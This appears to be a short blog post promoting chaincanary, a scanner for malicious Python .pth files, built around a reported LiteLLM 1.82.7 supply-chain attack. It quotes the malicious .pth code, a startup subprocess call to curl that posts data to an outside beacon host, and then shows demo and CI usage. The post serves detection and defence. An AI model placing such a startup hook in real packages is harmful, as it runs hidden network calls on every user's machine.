The Attack That Started It
On March 24, 2026, LiteLLM 1.82.7 was published to PyPI. It contained a file called litellm_init.pth:
import subprocess, sys
subprocess.Popen(
['curl', '-s', 'https://models.litellm.cloud/beacon', '-d', sys.version],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL
)
This wasn't in the main code. It was in a .pth file.
What Are .pth Files?
Python's .pth (path) files live in site-packages/ and execute every time you start Python — not just during pip install.
Most developers don't know this. Attackers do.
Why Other Scanners Missed It
| Tool | .pth Analysis |
|---|---|
| pip-audit | ❌ CVE database only |
| Safety | ❌ Known vulnerabilities |
| Trivy | ❌ SBOM + CVE |
| socket.dev | ❌ Not detected |
| chaincanary | ✅ Semantic classifier |
How chaincanary Works
Instead of flagging all .pth files, chaincanary classifies them:
EMPTY → silent
PATH_ONLY → silent
SAFE_CODE → LOW warning
DANGEROUS → CRITICAL → MALICIOUS
The LiteLLM file? subprocess.Popen(['curl', ...]) → DANGEROUS.
Demo
pip install chaincanary
chaincanary check litellm 1.82.7
Output:
🔍 chaincanary — Analyzing litellm==1.82.7
╭──────────┬──────────────────┬──────────────────────────────╮
│ Severity │ Rule │ Title │
├──────────┼──────────────────┼──────────────────────────────┤
│ CRITICAL │ PTH_FILE_INSTALL │ .pth file installs code... │
│ CRITICAL │ PTH_NETWORK │ phone-home on startup │
│ CRITICAL │ PTH_SUBPROCESS │ subprocess on startup │
╰──────────┴──────────────────┴──────────────────────────────╯
Score: 10.0 / 10.0
Verdict: ██ MALICIOUS
CI Integration
Add to your GitHub Actions:
- uses: AetherCore-Dev/chaincanary@v0.1.0
with:
requirements: requirements.txt
fail-on: MALICIOUS
The Philosophy
- No account required
- No data leaves your machine
- No Docker, no sandbox, no root
- Pure Python static analysis
Try It
pip install chaincanary
chaincanary check litellm 1.82.7
chaincanary audit requirements.txt
GitHub: https://github.com/AetherCore-Dev/chaincanary
Built after a real attack. Hope it helps you stay safe.
Top comments (0)